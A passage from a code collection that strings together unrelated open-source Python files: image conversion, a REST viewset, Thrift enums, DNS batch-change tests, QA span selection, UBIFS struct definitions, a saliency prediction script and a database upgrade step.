def get_pil_image(img):
""" Get image in python friendly format
Assumptions are that the image has byte pixels.
:return: array containing image
:rtype: pil image
"""
def pil_mode_from_image(img):
"""
Determine image format from pixel properties
May return None if our current encoding does not map to a PIL image
mode.
"""
if img.pixel_type() == img.PIXEL_UNSIGNED and img.pixel_num_bytes() == 1:
if img.depth() == 3 and img.d_step() == 1 and img.w_step() == 3:
return "RGB"
elif img.depth() == 4 and img.d_step() == 1 and img.w_step() == 4:
return "RGBA"
elif img.depth() == 1 and img.w_step() == 1:
return "L"
elif img.depth() == 1 and img.w_step() == 1:
if img.pixel_type() == img.PIXEL_BOOL and img.pixel_num_bytes() == 1:
return "1"
elif img.pixel_type() == img.PIXEL_SIGNED and img.pixel_num_bytes() == 4:
return "I"
elif img.pixel_type() == img.PIXEL_FLOAT and img.pixel_num_bytes() == 4:
return "F"
return None
mode = pil_mode_from_image(img)
if not mode:
# make a copy of this image using contiguous memory with interleaved channels
new_img = Image(img.width(), img.height(), img.depth(),
True, img.pixel_type(), img.pixel_num_bytes())
new_img.copy_from(img)
img = new_img
mode = pil_mode_from_image(img)
if not mode:
raise RuntimeError("Unsupported image format.")
# get buffer from image
if six.PY2:
img_pixels = buffer(bytearray(img))
else:
img_pixels = memoryview(bytearray(img)).tobytes()
pil_img = _pil_image_from_bytes(mode, (img.width(), img.height()),
img_pixels, "raw", mode,
img.h_step() * img.pixel_num_bytes(), 1)
return pil_img
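# Hedged usage sketch (an added example; assumes Pillow is importable as PIL):
#   import PIL.Image
#   p_img = PIL.Image.new("RGB", (64, 48))
#   v_img = from_pil(p_img)              # vital Image built from the same pixel bytes
#   p_round_trip = get_pil_image(v_img)  # convert back to a PIL image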
|
pydis_site/apps/api/viewsets/bot/offensive_message.py
|
Transfusion/site
| 700 |
70450
|
from rest_framework.mixins import (
CreateModelMixin,
DestroyModelMixin,
ListModelMixin
)
from rest_framework.viewsets import GenericViewSet
from pydis_site.apps.api.models.bot.offensive_message import OffensiveMessage
from pydis_site.apps.api.serializers import OffensiveMessageSerializer
class OffensiveMessageViewSet(
CreateModelMixin, ListModelMixin, DestroyModelMixin, GenericViewSet
):
"""
View providing CRUD access to offensive messages.
## Routes
### GET /bot/offensive-messages
Returns all offensive messages in the database.
#### Response format
>>> [
... {
... 'id': '631953598091100200',
... 'channel_id': '291284109232308226',
... 'delete_date': '2019-11-01T21:51:15.545000Z'
... },
... ...
... ]
#### Status codes
- 200: returned on success
### POST /bot/offensive-messages
Create a new offensive message object.
#### Request body
>>> {
... 'id': int,
... 'channel_id': int,
... 'delete_date': datetime.datetime # ISO-8601-formatted date
... }
#### Status codes
- 201: returned on success
- 400: if the body format is invalid
### DELETE /bot/offensive-messages/<id:int>
Delete the offensive message object with the given `id`.
#### Status codes
- 204: returned on success
    - 404: if an offensive message object with the given `id` does not exist
## Authentication
Requires an API token.
"""
serializer_class = OffensiveMessageSerializer
queryset = OffensiveMessage.objects.all()
|
impala/_thrift_gen/Metrics/ttypes.py
|
wzhou-code/impyla
| 661 |
70461
|
#
# Autogenerated by Thrift Compiler (0.11.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:new_style,no_utf8strings
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
from thrift.transport import TTransport
all_structs = []
class TUnit(object):
UNIT = 0
UNIT_PER_SECOND = 1
CPU_TICKS = 2
BYTES = 3
BYTES_PER_SECOND = 4
TIME_NS = 5
DOUBLE_VALUE = 6
NONE = 7
TIME_MS = 8
TIME_S = 9
TIME_US = 10
BASIS_POINTS = 11
_VALUES_TO_NAMES = {
0: "UNIT",
1: "UNIT_PER_SECOND",
2: "CPU_TICKS",
3: "BYTES",
4: "BYTES_PER_SECOND",
5: "TIME_NS",
6: "DOUBLE_VALUE",
7: "NONE",
8: "TIME_MS",
9: "TIME_S",
10: "TIME_US",
11: "BASIS_POINTS",
}
_NAMES_TO_VALUES = {
"UNIT": 0,
"UNIT_PER_SECOND": 1,
"CPU_TICKS": 2,
"BYTES": 3,
"BYTES_PER_SECOND": 4,
"TIME_NS": 5,
"DOUBLE_VALUE": 6,
"NONE": 7,
"TIME_MS": 8,
"TIME_S": 9,
"TIME_US": 10,
"BASIS_POINTS": 11,
}
class TMetricKind(object):
GAUGE = 0
COUNTER = 1
PROPERTY = 2
STATS = 3
SET = 4
HISTOGRAM = 5
_VALUES_TO_NAMES = {
0: "GAUGE",
1: "COUNTER",
2: "PROPERTY",
3: "STATS",
4: "SET",
5: "HISTOGRAM",
}
_NAMES_TO_VALUES = {
"GAUGE": 0,
"COUNTER": 1,
"PROPERTY": 2,
"STATS": 3,
"SET": 4,
"HISTOGRAM": 5,
}
fix_spec(all_structs)
del all_structs
|
modules/api/functional_test/live_tests/batch/approve_batch_change_test.py
|
slandry90/vinyldns
| 333 |
70462
|
from hamcrest import *
from utils import *
@pytest.mark.serial
@pytest.mark.manual_batch_review
def test_approve_pending_batch_change_success(shared_zone_test_context):
"""
Test approving a batch change succeeds for a support user
"""
client = shared_zone_test_context.ok_vinyldns_client
approver = shared_zone_test_context.support_user_client
batch_change_input = {
"changes": [
get_change_A_AAAA_json("test-approve-success.not.loaded.", address="4.3.2.1"),
get_change_A_AAAA_json("needs-review.not.loaded.", address="4.3.2.1"),
get_change_A_AAAA_json("zone-name-flagged-for-manual-review.zone.requires.review.")
],
"ownerGroupId": shared_zone_test_context.ok_group['id']
}
to_delete = []
to_disconnect = None
try:
result = client.create_batch_change(batch_change_input, status=202)
get_batch = client.get_batch_change(result['id'])
assert_that(get_batch['status'], is_('PendingReview'))
assert_that(get_batch['approvalStatus'], is_('PendingReview'))
assert_that(get_batch['changes'][0]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][0]['validationErrors'][0]['errorType'], is_('ZoneDiscoveryError'))
assert_that(get_batch['changes'][1]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][1]['validationErrors'][0]['errorType'], is_('RecordRequiresManualReview'))
assert_that(get_batch['changes'][2]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][2]['validationErrors'][0]['errorType'], is_('RecordRequiresManualReview'))
# need to create the zone so the change can succeed
zone = {
'name': 'not.loaded.',
'email': '<EMAIL>',
'adminGroupId': shared_zone_test_context.ok_group['id'],
'backendId': 'func-test-backend',
'shared': True
}
zone_create = approver.create_zone(zone, status=202)
to_disconnect = zone_create['zone']
approver.wait_until_zone_active(to_disconnect['id'])
approved = approver.approve_batch_change(result['id'], status=202)
completed_batch = client.wait_until_batch_change_completed(approved)
to_delete = [(change['zoneId'], change['recordSetId']) for change in completed_batch['changes']]
assert_that(completed_batch['status'], is_('Complete'))
for change in completed_batch['changes']:
assert_that(change['status'], is_('Complete'))
assert_that(len(change['validationErrors']), is_(0))
assert_that(completed_batch['approvalStatus'], is_('ManuallyApproved'))
assert_that(completed_batch['reviewerId'], is_('support-user-id'))
assert_that(completed_batch['reviewerUserName'], is_('support-user'))
assert_that(completed_batch, has_key('reviewTimestamp'))
        assert_that(get_batch, is_not(has_key('cancelledTimestamp')))
finally:
clear_zoneid_rsid_tuple_list(to_delete, client)
if to_disconnect:
approver.abandon_zones(to_disconnect['id'], status=202)
@pytest.mark.manual_batch_review
def test_approve_pending_batch_change_fails_if_there_are_still_errors(shared_zone_test_context):
"""
Test approving a batch change fails if there are still errors
"""
client = shared_zone_test_context.ok_vinyldns_client
approver = shared_zone_test_context.support_user_client
batch_change_input = {
"changes": [
get_change_A_AAAA_json("needs-review.nonexistent.", address="4.3.2.1"),
get_change_A_AAAA_json("zone.does.not.exist.")
],
"ownerGroupId": shared_zone_test_context.ok_group['id']
}
complete_rs = None
try:
result = client.create_batch_change(batch_change_input, status=202)
get_batch = client.get_batch_change(result['id'])
assert_that(get_batch['status'], is_('PendingReview'))
assert_that(get_batch['approvalStatus'], is_('PendingReview'))
assert_that(get_batch['changes'][0]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][0]['validationErrors'][0]['errorType'], is_('RecordRequiresManualReview'))
assert_that(get_batch['changes'][1]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][1]['validationErrors'][0]['errorType'], is_('ZoneDiscoveryError'))
approval_response = approver.approve_batch_change(result['id'], status=400)
assert_that((approval_response[0]['errors'][0]), contains_string('Zone Discovery Failed'))
assert_that((approval_response[1]['errors'][0]), contains_string('Zone Discovery Failed'))
updated_batch = client.get_batch_change(result['id'], status=200)
assert_that(updated_batch['status'], is_('PendingReview'))
assert_that(updated_batch['approvalStatus'], is_('PendingReview'))
        assert_that(updated_batch, is_not(has_key('reviewerId')))
        assert_that(updated_batch, is_not(has_key('reviewerUserName')))
        assert_that(updated_batch, is_not(has_key('reviewTimestamp')))
        assert_that(updated_batch, is_not(has_key('cancelledTimestamp')))
assert_that(updated_batch['changes'][0]['status'], is_('NeedsReview'))
assert_that(updated_batch['changes'][0]['validationErrors'][0]['errorType'], is_('ZoneDiscoveryError'))
assert_that(updated_batch['changes'][1]['status'], is_('NeedsReview'))
assert_that(updated_batch['changes'][1]['validationErrors'][0]['errorType'], is_('ZoneDiscoveryError'))
finally:
if complete_rs:
delete_result = client.delete_recordset(complete_rs['zoneId'], complete_rs['id'], status=202)
client.wait_until_recordset_change_status(delete_result, 'Complete')
@pytest.mark.manual_batch_review
def test_approve_batch_change_with_invalid_batch_change_id_fails(shared_zone_test_context):
"""
Test approving a batch change with invalid batch change ID
"""
client = shared_zone_test_context.ok_vinyldns_client
error = client.approve_batch_change("some-id", status=404)
assert_that(error, is_("Batch change with id some-id cannot be found"))
@pytest.mark.manual_batch_review
def test_approve_batch_change_with_comments_exceeding_max_length_fails(shared_zone_test_context):
"""
Test approving a batch change with comments exceeding 1024 characters fails
"""
client = shared_zone_test_context.ok_vinyldns_client
approve_batch_change_input = {
"reviewComment": "a"*1025
}
errors = client.approve_batch_change("some-id", approve_batch_change_input, status=400)['errors']
assert_that(errors, contains_inanyorder("Comment length must not exceed 1024 characters."))
@pytest.mark.manual_batch_review
def test_approve_batch_change_fails_with_forbidden_error_for_non_system_admins(shared_zone_test_context):
"""
Test approving a batch change if the reviewer is not a super user or support user
"""
client = shared_zone_test_context.ok_vinyldns_client
batch_change_input = {
"changes": [
get_change_A_AAAA_json("no-owner-group-id.ok.", address="4.3.2.1")
]
}
to_delete = []
try:
result = client.create_batch_change(batch_change_input, status=202)
completed_batch = client.wait_until_batch_change_completed(result)
to_delete = [(change['zoneId'], change['recordSetId']) for change in completed_batch['changes']]
error = client.approve_batch_change(completed_batch['id'], status=403)
assert_that(error, is_("User does not have access to item " + completed_batch['id']))
finally:
clear_zoneid_rsid_tuple_list(to_delete, client)
|
pygaggle/qa/span_selection.py
|
Elfsong/pygaggle
| 166 |
70473
|
<gh_stars>100-1000
import numpy as np
from collections import defaultdict
from .base import Answer
from .utils import normalize_answer
class SpanSelection:
def reset(self):
pass
def score(self, span, text):
pass
def add_answers(self, spans_by_text, texts):
pass
def top_answers(self, num_spans):
pass
def __str__(self):
pass
class DprSelection(SpanSelection):
def reset(self):
self.answers = []
def score(self, span, text):
return float(span.relevance_score), float(span.span_score)
def add_answers(self, spans_by_text, texts):
for spans, text in zip(spans_by_text, texts):
for span in spans:
self.answers.append(Answer(text=span.text,
context=text,
score=self.score(span, text)))
def top_answers(self, num_spans):
return sorted(self.answers, reverse=True, key=lambda answer: answer.score)[: num_spans]
def __str__(self):
return 'DPR'
class DprFusionSelection(DprSelection):
def __init__(self, beta, gamma):
self.beta = float(beta)
self.gamma = float(gamma)
def score(self, span, text):
return float(span.relevance_score) * self.beta + float(text.score) * self.gamma, float(span.span_score)
def __str__(self):
return f'DPR Fusion, beta={self.beta}, gamma={self.gamma}'
class GarSelection(SpanSelection):
def reset(self):
self.answers = defaultdict(int)
def score(self, span, text):
return float(span.relevance_score)
def add_answers(self, spans_by_text, texts):
eD = np.exp(np.array([self.score(spans[0], text) for spans, text in zip(spans_by_text, texts)]))
for i, spans in enumerate(spans_by_text):
topn_spans = spans[:5]
eSi = np.exp(np.array([float(span.span_score) for span in topn_spans]))
softmaxSi = list(eSi / np.sum(eSi))
for j, span in enumerate(topn_spans):
self.answers[normalize_answer(span.text)] += eD[i] * softmaxSi[j]
def top_answers(self, num_spans):
answers = sorted(list(self.answers.items()), reverse=True, key=lambda answer: answer[1])[: num_spans]
return list(map(lambda answer: Answer(text=answer[0], score=answer[1]), answers))
def __str__(self):
return 'GAR'
class GarFusionSelection(GarSelection):
def __init__(self, beta, gamma):
self.beta = float(beta)
self.gamma = float(gamma)
def score(self, span, text):
return float(span.relevance_score) * self.beta + float(text.score) * self.gamma
def __str__(self):
return f'GAR Fusion, beta={self.beta}, gamma={self.gamma}'
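# --- Editor's note: hedged usage sketch, not part of pygaggle. All strategies
# above share the same driver pattern; `spans_by_text` (answer spans per
# retrieved passage) and `texts` (the passages with their retrieval scores)
# are assumed to be produced upstream by a reader and retriever.
#
#   selector = DprSelection()
#   selector.reset()
#   selector.add_answers(spans_by_text, texts)
#   best = selector.top_answers(num_spans=5)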
|
environments/mujoco/rand_param_envs/mujoco_py/__init__.py
|
lfeng1999/varibad
| 119 |
70492
|
<reponame>lfeng1999/varibad<filename>environments/mujoco/rand_param_envs/mujoco_py/__init__.py
from .config import init_config, get_key_path
init_config()
from .mjviewer import MjViewer
from .mjcore import MjModel
from .mjcore import register_license
from .mjconstants import *
from .platname_targdir import targdir
register_license(get_key_path())
|
share/tools/ubi_reader/ubifs/defines.py
|
zengzhen1994k/leonsioy
| 143 |
70508
|
<reponame>zengzhen1994k/leonsioy<filename>share/tools/ubi_reader/ubifs/defines.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#############################################################
# Adapted in part from linux-source-3.2/fs/ubi/ubi-media.h
# for use in Python.
# Oct. 2013 by <NAME>
#
# Original copyright notice.
# --------------------------
#
# This file is part of UBIFS.
#
# Copyright (C) 2006-2008 Nokia Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# Authors: <NAME> (<NAME>)
# <NAME>
#
#############################################################
import struct
# Constant defines
# Common Header.
UBIFS_NODE_MAGIC = '\x31\x18\x10\x06' # Set to LSB
# Initial CRC32 value.
UBIFS_CRC32_INIT = 0xFFFFFFFF
# Do not compress data smaller than this.
UBIFS_MIN_COMPR_LEN = 128
# If the difference between the uncompressed data length and the compressed
# data length is less than this, do not compress the data.
UBIFS_MIN_COMPRESS_DIFF = 64
# Root inode number
UBIFS_ROOT_INO = 1
# Lowest inode number used for regular inodes (non-internal inodes).
UBIFS_FIRST_INO = 64
# Max file name and extended attribute length (multiple of 8, minus 1).
UBIFS_MAX_NLEN = 255
# Max number of data journal heads.
UBIFS_MAX_JHEADS = 1
# Max data node data length/amount attached to inode node.
UBIFS_BLOCK_SIZE = 4096
UBIFS_BLOCK_SHIFT = 12
# UBIFS padding byte pattern.
UBIFS_PADDING_BYTE = '\xCE'
# Max key length
UBIFS_MAX_KEY_LEN = 16
# Key length of simple format.
UBIFS_SK_LEN = 8
# Min index tree fanout.
UBIFS_MIN_FANOUT = 3
# Max number of levels in UBIFS indexing B-tree.
UBIFS_MAX_LEVELS = 512
# Max amount of data attached to inode in bytes.
UBIFS_MAX_INO_DATA = UBIFS_BLOCK_SIZE
# LEB Properties Tree fanout (a power of 2) and fanout shift.
UBIFS_LPT_FANOUT = 4
UBIFS_LPT_FANOUT_SHIFT = 2
# LEB Properties Tree bit field sizes.
UBIFS_LPT_CRC_BITS = 16
UBIFS_LPT_CRC_BYTES = 2
UBIFS_LPT_TYPE_BITS = 4
# LEB Properties Tree node types.
UBIFS_LPT_PNODE = 0 # LPT leaf node (contains LEB Properties)
UBIFS_LPT_NNODE = 1 # LPT internal node
UBIFS_LPT_LTAB = 2 # LPT's own lprops table
UBIFS_LPT_LSAVE = 3 # LPT's save table (big model only)
UBIFS_LPT_NODE_CNT = 4 # count of LPT node types
UBIFS_LPT_NOT_A_NODE = (1 << UBIFS_LPT_TYPE_BITS) - 1 # 4 bits of 1
# Inode types
UBIFS_ITYPE_REG = 0 # Regular file
UBIFS_ITYPE_DIR = 1 # Directory
UBIFS_ITYPE_LNK = 2 # Soft link
UBIFS_ITYPE_BLK = 3 # Block device node
UBIFS_ITYPE_CHR = 4 # Char device node
UBIFS_ITYPE_FIFO = 5 # FIFO
UBIFS_ITYPE_SOCK = 6 # Socket
UBIFS_ITYPES_CNT = 7 # Support file type count
# Supported key hash functions
UBIFS_KEY_HASH_R5 = 0 # R5 hash
UBIFS_KEY_HASH_TEST = 1 # Test hash, returns first 4 bytes of name
PRINT_UBIFS_KEY_HASH = ['r5', 'test']
# Supported key formats
UBIFS_SIMPLE_KEY_FMT = 0
# Simple key format uses 29 bits for storing UBIFS name and hash.
UBIFS_S_KEY_BLOCK_BITS = 29
UBIFS_S_KEY_BLOCK_MASK = 0x1FFFFFFF
UBIFS_S_KEY_HASH_BITS = UBIFS_S_KEY_BLOCK_BITS
UBIFS_S_KEY_HASH_MASK = UBIFS_S_KEY_BLOCK_MASK
# Key types
UBIFS_INO_KEY = 0 # Inode node key
UBIFS_DATA_KEY = 1 # Data node key
UBIFS_DENT_KEY = 2 # Directory node key
UBIFS_XENT_KEY = 3 # Extended attribute entry key
UBIFS_KEY_TYPES_CNT = 4 # Supported key count
# Number of reserved LEBs for Superblock area
UBIFS_SB_LEBS = 1
# Number of reserved LEBs for master area
UBIFS_MST_LEBS = 2
# First LEB of the Superblock area
UBIFS_SB_LNUM = 0
# First LEB of the master area
UBIFS_MST_LNUM = (UBIFS_SB_LNUM + UBIFS_SB_LEBS)
# First LEB of log area
UBIFS_LOG_LNUM = (UBIFS_MST_LNUM + UBIFS_MST_LEBS)
# On-flash inode flags
UBIFS_COMPR_FL = 1 # Use compression for this inode
UBIFS_SYNC_FL = 2 # Has to be synchronous I/O
UBIFS_IMMUTABLE_FL = 4 # Inode is immutable
UBIFS_APPEND_FL = 8 # Writes may only append data
UBIFS_DIRSYNC_FL = 16 # I/O on this directory inode must be synchronous
UBIFS_XATTR_FL = 32 # This inode is inode for extended attributes
# Inode flag bits used by UBIFS
UBIFS_FL_MASK = 0x0000001F
# Compression algorithms.
UBIFS_COMPR_NONE = 0 # No compression
UBIFS_COMPR_LZO = 1 # LZO compression
UBIFS_COMPR_ZLIB = 2 # ZLIB compression
UBIFS_COMPR_TYPES_CNT = 3 # Count of supported compression types
PRINT_UBIFS_COMPR = ['none','lzo','zlib']
# UBIFS node types
UBIFS_INO_NODE = 0 # Inode node
UBIFS_DATA_NODE = 1 # Data node
UBIFS_DENT_NODE = 2 # Directory entry node
UBIFS_XENT_NODE = 3 # Extended attribute node
UBIFS_TRUN_NODE = 4 # Truncation node
UBIFS_PAD_NODE = 5 # Padding node
UBIFS_SB_NODE = 6 # Superblock node
UBIFS_MST_NODE = 7 # Master node
UBIFS_REF_NODE = 8 # LEB reference node
UBIFS_IDX_NODE = 9 # Index node
UBIFS_CS_NODE = 10 # Commit start node
UBIFS_ORPH_NODE = 11 # Orphan node
UBIFS_NODE_TYPES_CNT = 12 # Count of supported node types
# Master node flags
UBIFS_MST_DIRTY = 1 # Rebooted uncleanly
UBIFS_MST_NO_ORPHS = 2 # No orphans present
UBIFS_MST_RCVRY = 4 # Written by recovery
# Node group type
UBIFS_NO_NODE_GROUP = 0 # This node is not part of a group
UBIFS_IN_NODE_GROUP = 1 # This node is part of a group
UBIFS_LAST_OF_NODE_GROUP = 2 # This node is the last in a group
# Superblock flags
UBIFS_FLG_BIGLPT = 2 # if 'big' LPT model is used if set.
UBIFS_FLG_SPACE_FIXUP = 4 # first-mount 'fixup' of free space within LEBs needed.
# Struct defines
# Common header node
UBIFS_COMMON_HDR_FORMAT = '<IIQIBB2s'
UBIFS_COMMON_HDR_FIELDS = ['magic', # UBIFS node magic number.
'crc', # CRC32 checksum of header.
'sqnum', # Sequence number.
'len', # Full node length.
'node_type', # Node type.
'group_type',# Node group type.
'padding'] # Reserved for future, zeros.
UBIFS_COMMON_HDR_SZ = struct.calcsize(UBIFS_COMMON_HDR_FORMAT)
# Key offset in key nodes
# out of place because of ordering issues.
UBIFS_KEY_OFFSET = UBIFS_COMMON_HDR_SZ
# Device node descriptor
UBIFS_DEV_DESC_FORMAT = '<IQ'
UBIFS_DEV_DESC_FIELDS = ['new', # New type device descriptor.
'huge'] # huge type device descriptor.
UBIFS_DEV_DESC_SZ = struct.calcsize(UBIFS_DEV_DESC_FORMAT)
# Inode node
UBIFS_INO_NODE_FORMAT = '<%ssQQQQQIIIIIIIIIII4sIH26s' % (UBIFS_MAX_KEY_LEN)
UBIFS_INO_NODE_FIELDS = ['key', # Node key
'creat_sqnum', # Sequence number at time of creation.
'size', # Inode size in bytes (uncompressed).
'atime_sec', # Access time in seconds.
'ctime_sec', # Creation time seconds.
'mtime_sec', # Modification time in seconds.
'atime_nsec', # Access time in nanoseconds.
'ctime_nsec', # Creation time in nanoseconds.
'mtime_nsec', # Modification time in nanoseconds.
'nlink', # Number of hard links.
'uid', # Owner ID.
'gid', # Group ID.
'mode', # Access flags.
'flags', # Per-inode flags.
'data_len', # Inode data length.
'xattr_cnt', # Count of extended attr this inode has
'xattr_size', # Summarized size of all extended
# attributes in bytes.
'padding1', # Reserved for future, zeros.
'xattr_names', # Sum of lengths of all extended.
# attribute names belonging to this
# inode.
'compr_type', # Compression type used for this inode.
'padding2'] # Reserved for future, zeros.
# 'data' No size
UBIFS_INO_NODE_SZ = struct.calcsize(UBIFS_INO_NODE_FORMAT)
# Directory entry node
UBIFS_DENT_NODE_FORMAT = '<%ssQBBH4s' % (UBIFS_MAX_KEY_LEN)
UBIFS_DENT_NODE_FIELDS = ['key', # Node key.
'inum', # Target inode number.
'padding1',# Reserved for future, zeros.
'type', # Type of target inode.
'nlen', # Name length.
'padding2']# Reserved for future, zeros.
# 'Name' No size
UBIFS_DENT_NODE_SZ = struct.calcsize(UBIFS_DENT_NODE_FORMAT)
# Data node
UBIFS_DATA_NODE_FORMAT = '<%ssIH2s' % (UBIFS_MAX_KEY_LEN)
UBIFS_DATA_NODE_FIELDS = ['key', # Node key.
'size', # Uncompressed data size.
'compr_type', # Compression type UBIFS_COMPR_*
'padding'] # Reserved for future, zeros.
# 'data' No size
UBIFS_DATA_NODE_SZ = struct.calcsize(UBIFS_DATA_NODE_FORMAT)
# Truncation node
UBIFS_TRUN_NODE_FORMAT = '<I12sQQ'
UBIFS_TRUN_NODE_FIELDS = ['inum', # Truncated inode number.
'padding', # Reserved for future, zeros.
'old_size', # size before truncation.
'new_size'] # Size after truncation.
UBIFS_TRUN_NODE_SZ = struct.calcsize(UBIFS_TRUN_NODE_FORMAT)
# Padding node
UBIFS_PAD_NODE_FORMAT = '<I'
UBIFS_PAD_NODE_FIELDS = ['pad_len'] # Number of bytes after this inode unused.
UBIFS_PAD_NODE_SZ = struct.calcsize(UBIFS_PAD_NODE_FORMAT)
# Superblock node
UBIFS_SB_NODE_FORMAT = '<2sBBIIIIIQIIIIIIIH2sIIQI16sI3968s'
UBIFS_SB_NODE_FIELDS = ['padding', # Reserved for future, zeros.
'key_hash', # Type of hash func used in keys.
'key_fmt', # Format of the key.
'flags', # File system flags.
'min_io_size', # Min I/O unit size.
'leb_size', # LEB size in bytes.
'leb_cnt', # LEB count used by FS.
'max_leb_cnt', # Max count of LEBS used by FS.
'max_bud_bytes', # Max amount of data stored in buds.
'log_lebs', # Log size in LEBs.
'lpt_lebs', # Number of LEBS used for lprops
# table.
'orph_lebs', # Number of LEBS used for
# recording orphans.
'jhead_cnt', # Count of journal heads
'fanout', # Tree fanout, max number of links
# per indexing node.
'lsave_cnt', # Number of LEB numbers in LPT's
# save table.
'fmt_version', # UBIFS on-flash format version.
'default_compr', # Default compression used.
'padding1', # Reserved for future, zeros.
'rp_uid', # Reserve pool UID
'rp_gid', # Reserve pool GID
'rp_size', # Reserve pool size in bytes
'time_gran', # Time granularity in nanoseconds.
'uuid', # UUID generated when the FS image
# was created.
'ro_compat_version',# UBIFS R/O Compatibility version.
'padding2'] #Reserved for future, zeros
UBIFS_SB_NODE_SZ = struct.calcsize(UBIFS_SB_NODE_FORMAT)
# Master node
UBIFS_MST_NODE_FORMAT = '<QQIIIIIIIIQQQQQQIIIIIIIIIIII344s'
UBIFS_MST_NODE_FIELDS = ['highest_inum',# Highest inode number in the
# committed index.
'cmt_no', # Commit Number.
'flags', # Various flags.
'log_lnum', # LEB num start of log.
'root_lnum', # LEB num of root indexing node.
'root_offs', # Offset within root_lnum
'root_len', # Root indexing node length.
'gc_lnum', # LEB reserved for garbage collection.
'ihead_lnum', # LEB num of index head.
'ihead_offs', # Offset of index head.
'index_size', # Size of index on flash.
'total_free', # Total free space in bytes.
'total_dirty', # Total dirty space in bytes.
'total_used', # Total used space in bytes (data LEBs)
'total_dead', # Total dead space in bytes (data LEBs)
'total_dark', # Total dark space in bytes (data LEBs)
'lpt_lnum', # LEB num of LPT root nnode.
'lpt_offs', # Offset of LPT root nnode.
'nhead_lnum', # LEB num of LPT head.
'nhead_offs', # Offset of LPT head.
'ltab_lnum', # LEB num of LPT's own lprop table.
'ltab_offs', # Offset of LPT's own lprop table.
'lsave_lnum', # LEB num of LPT's save table.
'lsave_offs', # Offset of LPT's save table.
'lscan_lnum', # LEB num of last LPT scan.
'empty_lebs', # Number of empty LEBs.
'idx_lebs', # Number of indexing LEBs.
'leb_cnt', # Count of LEBs used by FS.
'padding'] # Reserved for future, zeros.
UBIFS_MST_NODE_SZ = struct.calcsize(UBIFS_MST_NODE_FORMAT)
# LEB Reference node
UBIFS_REF_NODE_FORMAT = '<III28s'
UBIFS_REF_NODE_FIELDS = ['lnum', # Referred LEB number.
'offs', # Start offset of referred LEB.
'jhead', # Journal head number.
'padding'] # Reserved for future, zeros.
UBIFS_REF_NODE_SZ = struct.calcsize(UBIFS_REF_NODE_FORMAT)
# key/reference/length branch
UBIFS_BRANCH_FORMAT = '<III%ss' % (UBIFS_SK_LEN)
UBIFS_BRANCH_FIELDS = ['lnum', # LEB number of target node.
'offs', # Offset within lnum.
'len', # Target node length.
'key'] # Using UBIFS_SK_LEN as size.
UBIFS_BRANCH_SZ = struct.calcsize(UBIFS_BRANCH_FORMAT)
# Indexing node
UBIFS_IDX_NODE_FORMAT = '<HH'
UBIFS_IDX_NODE_FIELDS = ['child_cnt', # Number of child index nodes.
'level'] # Tree level.
# branches, no size.
UBIFS_IDX_NODE_SZ = struct.calcsize(UBIFS_IDX_NODE_FORMAT)
# File chunk size for reads.
FILE_CHUNK_SZ = 5 * 1024 * 1024
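# --- Editor's illustration (not part of ubi_reader): a minimal sketch of how
# the FORMAT/FIELDS pairs above are intended to be used. `buf` is assumed to
# be a bytes object starting at a node boundary of a UBIFS image.
def _example_parse_common_hdr(buf):
    """Unpack a common header into a dict keyed by UBIFS_COMMON_HDR_FIELDS."""
    values = struct.unpack(UBIFS_COMMON_HDR_FORMAT, buf[:UBIFS_COMMON_HDR_SZ])
    return dict(zip(UBIFS_COMMON_HDR_FIELDS, values))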
|
scripts/03-predict.py
|
LaudateCorpus1/salgan
| 243 |
70522
|
<reponame>LaudateCorpus1/salgan
import os
import numpy as np
from tqdm import tqdm
import cv2
import glob
from utils import *
from constants import *
from models.model_bce import ModelBCE
def test(path_to_images, path_output_maps, model_to_test=None):
list_img_files = [k.split('/')[-1].split('.')[0] for k in glob.glob(os.path.join(path_to_images, '*'))]
# Load Data
list_img_files.sort()
for curr_file in tqdm(list_img_files, ncols=20):
print os.path.join(path_to_images, curr_file + '.jpg')
img = cv2.cvtColor(cv2.imread(os.path.join(path_to_images, curr_file + '.jpg'), cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB)
predict(model=model_to_test, image_stimuli=img, name=curr_file, path_output_maps=path_output_maps)
def main():
# Create network
model = ModelBCE(INPUT_SIZE[0], INPUT_SIZE[1], batch_size=8)
    # Here we need to specify the epoch of the model snapshot
load_weights(model.net['output'], path='gen_', epochtoload=90)
    # Here we need to specify the path to the images and the output path
test(path_to_images='../images/', path_output_maps='../saliency/', model_to_test=model)
if __name__ == "__main__":
main()
|
dbaas/workflow/steps/util/database_upgrade_patch.py
|
amintasvrp/database-as-a-service
| 303 |
70523
|
<reponame>amintasvrp/database-as-a-service<gh_stars>100-1000
# -*- coding: utf-8 -*-
from workflow.steps.util.base import BaseInstanceStep
import os
import logging
LOG = logging.getLogger(__name__)
class CantUpgradePatch(Exception):
pass
class DatabaseUpgradePatchStep(BaseInstanceStep):
def __init__(self, instance):
super(DatabaseUpgradePatchStep, self).__init__(instance)
upgrade = self.database.upgrades_patch.last()
if upgrade and upgrade.is_running:
self.target_patch = upgrade.target_patch
self.source_patch = upgrade.source_patch
else:
self.target_patch = self.infra.engine_patch
self.source_patch = self.engine.default_engine_patch
def __unicode__(self):
return "Changing database binaries..."
@property
def patch_path_by_os(self):
pp = self.target_patch.patch_path
if self.host.is_ol7:
pp = self.target_patch.patch_path_ol7 or pp
return pp
@property
def is_valid(self):
if self.source_patch == self.target_patch:
return False
if self.source_patch.engine != self.target_patch.engine:
error = "Can not change the Engine."
            error += " Source engine={}, target engine={}".format(
self.source_patch.engine,
self.target_patch.engine)
raise CantUpgradePatch(error)
